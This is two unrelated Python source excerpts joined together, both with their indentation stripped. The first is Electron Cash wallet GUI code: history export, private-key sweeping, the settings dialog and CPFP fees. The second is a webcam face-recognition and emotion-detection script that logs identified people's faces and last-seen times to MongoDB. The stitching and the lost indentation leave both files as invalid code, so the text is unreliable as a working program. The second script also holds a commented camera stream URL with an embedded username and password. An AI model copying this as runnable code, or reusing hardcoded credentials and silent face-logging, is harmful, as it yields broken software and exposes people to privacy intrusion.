hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electron Cash was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.export_history(fx=self.fx)
lines = []
for item in history:
if is_csv:
lines.append([item['txid'], item.get('label', ''), item['confirmations'], item['value'], item['date']])
else:
lines.append(item)
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent=4))
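# Sweep external private keys: prompt for the keys and a destination address in this
# wallet, gather the spendable coins for those keys via sweep_preparations(), then
# pre-fill the Send tab (frozen fields, max amount) so the user only has to confirm.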
def sweep_key_dialog(self):
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
if not addresses:
self.show_warning(_('Wallet has no address to sweep to'))
return
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
h, addr_combo = address_combo(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
sweep_button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), sweep_button))
def get_address_text():
return addr_combo.currentText()
def get_priv_keys():
return keystore.get_private_keys(keys_e.toPlainText())
def enable_sweep():
sweep_button.setEnabled(bool(get_address_text()
and get_priv_keys()))
keys_e.textChanged.connect(enable_sweep)
enable_sweep()
if not d.exec_():
return
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_priv_keys(), self.network)
self.tx_external_keypairs = keypairs
self.payto_e.setText(get_address_text())
self.spend_coins(coins)
self.spend_max()
except BaseException as e:
self.show_message(str(e))
return
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
def import_addr(addr):
if self.wallet.import_address(Address.from_string(addr)):
return addr
return ''
self._do_import(title, msg, import_addr)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def cashaddr_icon(self):
if self.config.get('show_cashaddr', False):
return QIcon(":icons/tab_converter.png")
else:
return QIcon(":icons/tab_converter_bw.png")
def update_cashaddr_icon(self):
self.addr_converter_button.setIcon(self.cashaddr_icon())
def toggle_cashaddr_status_bar(self):
self.toggle_cashaddr(not self.config.get('show_cashaddr', False))
def toggle_cashaddr_settings(self, state):
self.toggle_cashaddr(state == Qt.Checked)
def toggle_cashaddr(self, on):
self.config.set_key('show_cashaddr', on)
Address.show_cashaddr(on)
for window in self.gui_object.windows:
window.cashaddr_toggled_signal.emit()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
cashaddr_cb = QCheckBox(_('CashAddr address format'))
cashaddr_cb.setChecked(Address.FMT_UI == Address.FMT_CASHADDR)
cashaddr_cb.setToolTip(_("If unchecked, addresses are shown in legacy format"))
cashaddr_cb.stateChanged.connect(self.toggle_cashaddr_settings)
gui_widgets.append((cashaddr_cb, None))
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electroncash.i18n import languages
language_names = []
language_keys = []
for item in languages.items():
language_keys.append(item[0])
language_names.append(item[1])
lang_combo.addItems(language_names)
try:
index = language_keys.index(self.config.get("language",''))
except ValueError:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]:
w.setEnabled(False)
def on_lang(x):
lang_request = language_keys[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_customfee(x):
amt = customfee_e.get_amount()
m = int(amt * 1000.0) if amt is not None else None
self.config.set_key('customfee', m)
self.fee_slider.update()
self.fee_slider_mogrifier()
customfee_e = BTCSatsByteEdit()
customfee_e.setAmount(self.config.custom_fee_rate() / 1000.0 if self.config.has_custom_fee_rate() else None)
customfee_e.textChanged.connect(on_customfee)
customfee_label = HelpLabel(_('Custom Fee Rate'), _('Custom Fee Rate in Satoshis per byte'))
fee_widgets.append((customfee_label, customfee_e))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_e.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['BCH', 'mBCH', 'cash']
msg = _('Base unit of your wallet.')\
+ '\n1 BCH = 1,000 mBCH = 1,000,000 cash.\n' \
+ _(' These settings affect the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
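# Switching the base unit maps BCH/mBCH/cash to decimal_point 8/5/2, caps the
# zeros spinbox accordingly, refreshes the lists and re-applies the remembered
# amounts to the edit fields.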
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'BCH':
self.decimal_point = 8
elif unit_result == 'mBCH':
self.decimal_point = 5
elif unit_result == 'cash':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = web.BE_sorted_list()
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(web.BE_from_config(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electroncash import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
            _('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def on_opret(x):
self.config.set_key('enable_opreturn', bool(x))
if not x:
self.message_opreturn_e.setText("")
self.op_return_toolong = False
self.message_opreturn_e.setHidden(not x)
self.opreturn_label.setHidden(not x)
enable_opreturn = bool(self.config.get('enable_opreturn'))
opret_cb = QCheckBox(_('Enable OP_RETURN output'))
opret_cb.setToolTip(_('Enable posting messages with OP_RETURN.'))
opret_cb.setChecked(enable_opreturn)
opret_cb.stateChanged.connect(on_opret)
tx_widgets.append((opret_cb,None))
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electron Cash to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
# We catch these errors with the understanding that there is no recovery at
# this point, given user has likely performed an action we cannot recover
# cleanly from. So we attempt to exit as cleanly as possible.
try:
self.config.set_key("is_maximized", self.isMaximized())
self.config.set_key("console-history", self.console.history[-50:], True)
except (OSError, PermissionError) as e:
self.print_error("unable to write to config (directory removed?)", e)
if not self.isMaximized():
try:
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),g.width(),g.height()])
except (OSError, PermissionError) as e:
self.print_error("unable to write to wallet storage (directory removed?)", e)
# Should be no side-effects in this function relating to file access past this point.
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def internal_plugins_dialog(self):
self.internalpluginsdialog = d = WindowModalDialog(self, _('Optional Features'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.get_internal_plugin_count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle_internal_plugin(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# All plugins get this whenever one is toggled.
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.internal_plugin_metadata.values()):
name = descr['__name__']
p = plugins.get_internal_plugin(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_internal_plugin_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.internal_plugin_metadata.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def external_plugins_dialog(self):
from . import external_plugins_window
self.externalpluginsdialog = d = external_plugins_window.ExternalPluginsDialog(self, _('Plugin Manager'))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
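        # the child pays for both transactions, so the fee is computed over the combined estimated size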
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
        grid.addWidget(QLabel(_('Fee') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
        fee = fee_e.get_amount()
        if fee is None:
            return  # fee box left empty
        if fee > max_fee:
            self.show_error(_('Max fee exceeded'))
            return
new_tx = self.wallet.cpfp(parent_tx, fee)
if new_tx is None:
self.show_error(_('CPFP no longer valid'))
return
self.show_transaction(new_tx)
|
main.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import face_recognition
import cv2
import numpy as np
import pymongo
import sys
import time
import logging as log
from imutils.video import WebcamVideoStream
from openvino.inference_engine import IENetwork, IEPlugin
from sklearn.metrics.pairwise import cosine_similarity
import requests
import subprocess
import datetime as dt
from multiprocessing import Process, Queue
from imutils import face_utils
import dlib
import json
import socket
import base64
import pickle
import jsonpickle
import zmq
em_client = pymongo.MongoClient("mongodb://localhost:27017/")
dblist = em_client.list_database_names()
if "Main_DB" in dblist:
print("========================")
print("Main_db found in Mongo")
print("========================")
em_db = em_client["Main_DB"]
em_col = em_db["face_info"]
prev_face_col = em_db["face_logs"]
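    # face_info holds the enrolled name/encoding documents; face_logs keeps a last-seen record per recognized person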
# run docker and connect to api
subprocess.call("./docker_run.sh")
addr = 'http://localhost:5000'
test_url = addr + '/api/test'
q = Queue(maxsize=100)
# emotion task scheduler
def process_task():
global test_url, em_col
while True:
item = q.get()
        if item is None:
            continue
        if item['eof'] is True:
            print("break")
            break
name = item['face_id']
faces = item['frame']
filename = '/home/vysakh/Accubits/INTEL/Accelerated-Face-Reidentification-and-Emotion-Recognition' \
'/docker_fetch/image' + str(name) + '.jpg'
cv2.imwrite(filename, faces)
# get response
params = {'arg1': name}
response = requests.post(test_url, data=params)
print(response.text)
del response, item
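    # re-queue the EOF marker so the remaining worker processes also see it and exit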
q.put({'eof': True})
# container function to initialise OpenVINO models
def init_model(xml, bins):
model_xml = xml
model_bin = bins
# Plugin initialization for specified device and load extensions library if specified
plugin = IEPlugin(device='CPU')
plugin.add_cpu_extension(
'/opt/intel/openvino/inference_engine/lib/intel64/libcpu_extension_sse4.so')
log.info("Reading IR...")
net = IENetwork(model=model_xml, weights=model_bin)
if plugin.device == "CPU":
supported_layers = plugin.get_supported_layers(net)
not_supported_layers = [l for l in net.layers.keys() if l not in supported_layers]
if len(not_supported_layers) != 0:
log.error("Following layers are not supported by the plugin for specified device {}:\n {}".
format(plugin.device, ', '.join(not_supported_layers)))
log.error("Please try to specify cpu extensions library path in demo's command line parameters using -l "
"or --cpu_extension command line argument")
sys.exit(1)
input_blob = next(iter(net.inputs))
out_blob = next(iter(net.outputs))
log.info("Loading IR to the plugin...")
exec_nets = plugin.load(network=net, num_requests=2)
n, c, h, w = net.inputs[input_blob].shape
del net
return exec_nets, n, c, w, h, input_blob, out_blob, plugin
def calculate_cosine(face_encodings, face_to_compare):
if len(face_encodings) == 0:
return np.empty(0)
sims = cosine_similarity(face_encodings, face_to_compare.reshape(1, -1))
return sims
def main():
emotion_list = ['neutral', 'happy', 'sad', 'surprise', 'anger'] # for parsing emotion detection result
gender_list = ['female', 'male'] # parse gender model result
# paths to models
face_xml = "utils/face-detection-adas-0001.xml"
face_bin = "utils/face-detection-adas-0001.bin"
emotion_xml = "utils/emotions-recognition-retail-0003.xml"
emotion_bin = "utils/emotions-recognition-retail-0003.bin"
age_gender_xml = "utils/age-gender-recognition-retail-0013.xml"
age_gender_bin = "utils/age-gender-recognition-retail-0013.bin"
landmark_model = "utils/shape_predictor_68_face_landmarks.dat"
context = zmq.Context()
footage_socket = context.socket(zmq.PUB)
footage_socket.connect('tcp://0.0.0.0:5555')
emotion_socket = context.socket(zmq.PUB)
emotion_socket.connect('tcp://0.0.0.0:5556')
# initialize emotion rec and age_gender models
exec_net, n, c, w, h, input_blob, out_blob, plugin = init_model(emotion_xml, emotion_bin)
age_gender_net, n_a, c_a, w_a, h_a, input_blob_a, out_blob_a, plugin_a = init_model(age_gender_xml, age_gender_bin)
face_detection_net, n_f, c_f, w_f, h_f, input_blob_f, out_blob_f, plugin_f = init_model(face_xml, face_bin)
landmark_predictor = dlib.shape_predictor(landmark_model)
# load known faces from DB
faces = list(em_col.find({}))
# Get a reference to webcam #0 (the default one)
# fvs = WebcamVideoStream(src='rtsp://admin:AccubitsEmotix@192.168.0.10:554/Streaming/channels/1/').start()
fvs = WebcamVideoStream(src=0).start()
time.sleep(0.5)
known_face_encodings = []
known_face_names = []
# Create arrays of known face encodings and their names
for face in faces:
for face_encods in face['encoding']:
known_face_encodings.append(np.asarray(face_encods))
known_face_names.append(face['name'])
# Initialize some variables
frame_count = 0
cur_request_id = 0
next_request_id = 1
cur_request_id_a = 0
next_request_id_a = 1
cur_request_id_f = 0
next_request_id_f = 1
emotion = None
initial_frame = fvs.read()
initial_h, initial_w = initial_frame.shape[:2]
while True:
# Grab a single frame of video
frame = fvs.read()
frame_copy = fvs.read()
if frame is None:
break
# Find all the faces and face encodings in the current frame of video
face_locations = []
face_locations_keypoint = []
in_frame = cv2.resize(frame, (w_f, h_f))
in_frame = in_frame.transpose((2, 0, 1)) # Change data layout from HWC to CHW
in_frame = in_frame.reshape((n_f, c_f, h_f, w_f))
        face_detection_net.start_async(request_id=cur_request_id_f, inputs={input_blob_f: in_frame})
if face_detection_net.requests[cur_request_id_f].wait(-1) == 0:
face_detection_res = face_detection_net.requests[cur_request_id_f].outputs[out_blob_f]
for face_loc in face_detection_res[0][0]:
if face_loc[2] > 0.5:
xmin = abs(int(face_loc[3] * initial_w))
ymin = abs(int(face_loc[4] * initial_h))
xmax = abs(int(face_loc[5] * initial_w))
ymax = abs(int(face_loc[6] * initial_h))
face_locations.append((xmin, ymin, xmax, ymax))
face_locations_keypoint.append(dlib.rectangle(xmin, ymin, xmax, ymax))
face_encodings = face_recognition.face_encodings(frame, face_locations)
face_names = []
for face_encoding in face_encodings:
# See if the face is a match for the known face(s)
matches = face_recognition.compare_faces(known_face_encodings, face_encoding)
name = "Unknown"
# If a match was found in known_face_encodings, just use the first one.
if True in matches:
first_match_index = matches.index(True)
name = known_face_names[first_match_index]
face_names.append(name)
emotion_payload = []
# Display the results
for (left, top, right, bottom), name in zip(face_locations, face_names):
face = frame[top:bottom, left:right] # extract face
# run the emotion inference on extracted face
in_frame = cv2.resize(face, (w, h))
in_frame = in_frame.transpose((2, 0, 1)) # Change data layout from HWC to CHW
in_frame = in_frame.reshape((n, c, h, w))
exec_net.start_async(request_id=cur_request_id, inputs={input_blob: in_frame})
if exec_net.requests[cur_request_id].wait(-1) == 0:
res = exec_net.requests[cur_request_id].outputs[out_blob]
emotion_dict = dict()
emotion_dict['neutral'] = res[0][0][0][0]
emotion_dict['happy'] = res[0][1][0][0]
emotion_dict['sad'] = res[0][2][0][0]
emotion_dict['surprise'] = res[0][3][0][0]
emotion_dict['angry'] = res[0][4][0][0]
emotion_payload.append(emotion_dict)
emo_pred = np.argmax(res)
emotion = emotion_list[emo_pred]
# run age and gender inference
age_frame = cv2.resize(face, (w_a, h_a))
age_frame = age_frame.transpose((2, 0, 1))
age_frame = age_frame.reshape((n_a, c_a, h_a, w_a))
age_gender_net.start_async(request_id=cur_request_id_a, inputs={input_blob_a: age_frame})
if age_gender_net.requests[cur_request_id_a].wait(-1) == 0:
dec = age_gender_net.requests[cur_request_id_a].outputs
gender = dec['prob']
age = dec['age_conv3']
age = int(age[0][0][0][0] * 100)
gender = gender_list[np.argmax(gender)]
# add face to queue for emotyx module
if frame_count % 100 == 0:
_, face_id = str(dt.datetime.now()).split('.')
face_pic = frame_copy[top - 100:bottom + 100, left - 100:right + 100]
item = dict()
item['frame'] = face_pic
item['face_id'] = face_id
item['eof'] = False
q.put(item)
            if name != "Unknown":
if not list(prev_face_col.find({"name": name})):
prev_face_col.insert(
{'name': name, 'last_seen': dt.datetime.now(), 'image': 'face_logs/' + str(name) + '.jpg'})
else:
prev_face_col.update({'name': name}, {'$set': {'last_seen': dt.datetime.now()}})
cv2.imwrite('face_logs/' + str(name) + '.jpg', face)
overlay = frame.copy()
alpha = 0.6
cv2.rectangle(overlay, (left, top), (right, bottom), (65, 65, 65), 2)
cv2.rectangle(overlay, (right, top), (right + 150, top + 100), (65, 65, 65), cv2.FILLED)
cv2.addWeighted(overlay, alpha, frame, 1 - alpha,
0, frame)
# Draw a label with a name below the face
